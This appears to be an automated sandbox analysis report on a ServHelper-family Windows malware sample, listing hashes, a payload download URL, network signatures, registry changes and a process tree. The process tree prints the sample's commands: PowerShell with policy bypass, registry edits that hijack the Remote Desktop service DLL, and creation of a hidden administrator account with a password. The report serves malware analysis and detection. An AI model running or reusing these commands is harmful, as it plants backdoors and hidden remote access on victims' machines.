Analysis
-
max time kernel
89s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
22-09-2021 07:10
Static task
static1
Behavioral task
behavioral1
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win10v20210408
General
-
Target
61d5e32562d1c70daf0a3112f7888258.exe
-
Size
5.7MB
-
MD5
61d5e32562d1c70daf0a3112f7888258
-
SHA1
11c54ce99e87637f58c7bc0bd8134c73df9bf879
-
SHA256
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
-
SHA512
9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 4 4184 powershell.exe 8 4184 powershell.exe 9 4184 powershell.exe 10 4184 powershell.exe 12 4184 powershell.exe 14 4184 powershell.exe 17 4184 powershell.exe 19 4184 powershell.exe 21 4184 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4004 4004 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID7BD.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dcjatqss.2le.ps1 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87C.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_di5i12c1.sp3.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID86B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87D.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID85A.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4756 powershell.exe 4756 powershell.exe 4756 powershell.exe 5056 powershell.exe 5056 powershell.exe 5056 powershell.exe 4280 powershell.exe 4280 powershell.exe 4280 powershell.exe 64 powershell.exe 64 powershell.exe 64 powershell.exe 4756 powershell.exe 4756 powershell.exe 4756 powershell.exe 4184 powershell.exe 4184 powershell.exe 4184 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeIncreaseQuotaPrivilege 5056 powershell.exe Token: SeSecurityPrivilege 5056 powershell.exe Token: SeTakeOwnershipPrivilege 5056 powershell.exe Token: SeLoadDriverPrivilege 5056 powershell.exe Token: SeSystemProfilePrivilege 5056 powershell.exe Token: SeSystemtimePrivilege 5056 powershell.exe Token: SeProfSingleProcessPrivilege 5056 powershell.exe Token: SeIncBasePriorityPrivilege 5056 powershell.exe Token: SeCreatePagefilePrivilege 5056 powershell.exe Token: SeBackupPrivilege 5056 powershell.exe Token: SeRestorePrivilege 5056 powershell.exe Token: SeShutdownPrivilege 5056 powershell.exe Token: SeDebugPrivilege 5056 powershell.exe Token: SeSystemEnvironmentPrivilege 5056 powershell.exe Token: SeRemoteShutdownPrivilege 5056 powershell.exe Token: SeUndockPrivilege 5056 powershell.exe Token: SeManageVolumePrivilege 5056 powershell.exe Token: 33 5056 powershell.exe Token: 34 5056 powershell.exe Token: 35 5056 powershell.exe Token: 36 5056 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeIncreaseQuotaPrivilege 4280 powershell.exe Token: SeSecurityPrivilege 4280 powershell.exe Token: SeTakeOwnershipPrivilege 4280 powershell.exe Token: SeLoadDriverPrivilege 4280 powershell.exe Token: SeSystemProfilePrivilege 4280 powershell.exe Token: SeSystemtimePrivilege 4280 powershell.exe Token: SeProfSingleProcessPrivilege 4280 powershell.exe Token: SeIncBasePriorityPrivilege 4280 powershell.exe Token: SeCreatePagefilePrivilege 4280 powershell.exe Token: SeBackupPrivilege 4280 powershell.exe Token: SeRestorePrivilege 4280 powershell.exe Token: SeShutdownPrivilege 4280 powershell.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeSystemEnvironmentPrivilege 4280 powershell.exe Token: SeRemoteShutdownPrivilege 4280 powershell.exe Token: SeUndockPrivilege 4280 powershell.exe Token: SeManageVolumePrivilege 4280 powershell.exe Token: 33 4280 powershell.exe Token: 34 4280 powershell.exe Token: 35 4280 powershell.exe Token: 36 4280 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeIncreaseQuotaPrivilege 64 powershell.exe Token: SeSecurityPrivilege 64 powershell.exe Token: SeTakeOwnershipPrivilege 64 powershell.exe Token: SeLoadDriverPrivilege 64 powershell.exe Token: SeSystemProfilePrivilege 64 powershell.exe Token: SeSystemtimePrivilege 64 powershell.exe Token: SeProfSingleProcessPrivilege 64 powershell.exe Token: SeIncBasePriorityPrivilege 64 powershell.exe Token: SeCreatePagefilePrivilege 64 powershell.exe Token: SeBackupPrivilege 64 powershell.exe Token: SeRestorePrivilege 64 powershell.exe Token: SeShutdownPrivilege 64 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeSystemEnvironmentPrivilege 64 powershell.exe Token: SeRemoteShutdownPrivilege 64 powershell.exe Token: SeUndockPrivilege 64 powershell.exe Token: SeManageVolumePrivilege 64 powershell.exe Token: 33 64 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
61d5e32562d1c70daf0a3112f7888258.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4648 wrote to memory of 4756 4648 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 4648 wrote to memory of 4756 4648 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 4756 wrote to memory of 4924 4756 powershell.exe csc.exe PID 4756 wrote to memory of 4924 4756 powershell.exe csc.exe PID 4924 wrote to memory of 4956 4924 csc.exe cvtres.exe PID 4924 wrote to memory of 4956 4924 csc.exe cvtres.exe PID 4756 wrote to memory of 5056 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 5056 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 4280 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 4280 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 64 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 64 4756 powershell.exe powershell.exe PID 4756 wrote to memory of 3852 4756 powershell.exe reg.exe PID 4756 wrote to memory of 3852 4756 powershell.exe reg.exe PID 4756 wrote to memory of 4040 4756 powershell.exe reg.exe PID 4756 wrote to memory of 4040 4756 powershell.exe reg.exe PID 4756 wrote to memory of 4072 4756 powershell.exe reg.exe PID 4756 wrote to memory of 4072 4756 powershell.exe reg.exe PID 4756 wrote to memory of 4424 4756 powershell.exe net.exe PID 4756 wrote to memory of 4424 4756 powershell.exe net.exe PID 4424 wrote to memory of 4444 4424 net.exe net1.exe PID 4424 wrote to memory of 4444 4424 net.exe net1.exe PID 4756 wrote to memory of 1648 4756 powershell.exe cmd.exe PID 4756 wrote to memory of 1648 4756 powershell.exe cmd.exe PID 1648 wrote to memory of 2892 1648 cmd.exe cmd.exe PID 1648 wrote to memory of 2892 1648 cmd.exe cmd.exe PID 2892 wrote to memory of 4588 2892 cmd.exe net.exe PID 2892 wrote to memory of 4588 2892 cmd.exe net.exe PID 4588 wrote to memory of 4596 4588 net.exe net1.exe PID 4588 wrote to memory of 4596 4588 net.exe net1.exe PID 4756 wrote to memory of 4240 4756 powershell.exe cmd.exe PID 4756 wrote to memory of 4240 4756 powershell.exe cmd.exe PID 4240 wrote to memory of 4576 4240 cmd.exe cmd.exe PID 4240 wrote to memory of 4576 4240 cmd.exe cmd.exe PID 4576 wrote to memory of 4568 4576 cmd.exe net.exe PID 4576 wrote to memory of 4568 4576 cmd.exe net.exe PID 4568 wrote to memory of 4704 4568 net.exe net1.exe PID 4568 wrote to memory of 4704 4568 net.exe net1.exe PID 4856 wrote to memory of 4920 4856 cmd.exe net.exe PID 4856 wrote to memory of 4920 4856 cmd.exe net.exe PID 4920 wrote to memory of 4948 4920 net.exe net1.exe PID 4920 wrote to memory of 4948 4920 net.exe net1.exe PID 4968 wrote to memory of 4996 4968 cmd.exe net.exe PID 4968 wrote to memory of 4996 4968 cmd.exe net.exe PID 4996 wrote to memory of 5016 4996 net.exe net1.exe PID 4996 wrote to memory of 5016 4996 net.exe net1.exe PID 5032 wrote to memory of 4100 5032 cmd.exe net.exe PID 5032 wrote to memory of 4100 5032 cmd.exe net.exe PID 4100 wrote to memory of 3912 4100 net.exe net1.exe PID 4100 wrote to memory of 3912 4100 net.exe net1.exe PID 2036 wrote to memory of 3560 2036 cmd.exe net.exe PID 2036 wrote to memory of 3560 2036 cmd.exe net.exe PID 3560 wrote to memory of 3364 3560 net.exe net1.exe PID 3560 wrote to memory of 3364 3560 net.exe net1.exe PID 3596 wrote to memory of 3040 3596 cmd.exe net.exe PID 3596 wrote to memory of 3040 3596 cmd.exe net.exe PID 3040 wrote to memory of 4252 3040 net.exe net1.exe PID 3040 wrote to memory of 4252 3040 net.exe net1.exe PID 5096 wrote to memory of 4128 5096 cmd.exe net.exe PID 5096 wrote to memory of 4128 5096 cmd.exe net.exe PID 4128 wrote to memory of 2232 4128 net.exe net1.exe PID 4128 wrote to memory of 2232 4128 net.exe net1.exe PID 3236 wrote to memory of 4264 3236 cmd.exe WMIC.exe PID 3236 wrote to memory of 4264 3236 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7692.tmp" "c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\CSC44318BFD60CB49CF9B55EE690A69664.TMP"4⤵PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3852
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4040 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4072
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:4444
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4596
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:4704
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3600
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3676
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:4948
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc TkxJONhF /add1⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc TkxJONhF /add2⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc TkxJONhF /add3⤵PID:5016
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3912
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:3364
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:4252
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc TkxJONhF1⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc TkxJONhF2⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc TkxJONhF3⤵PID:2232
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:4264
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3216
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:668
-
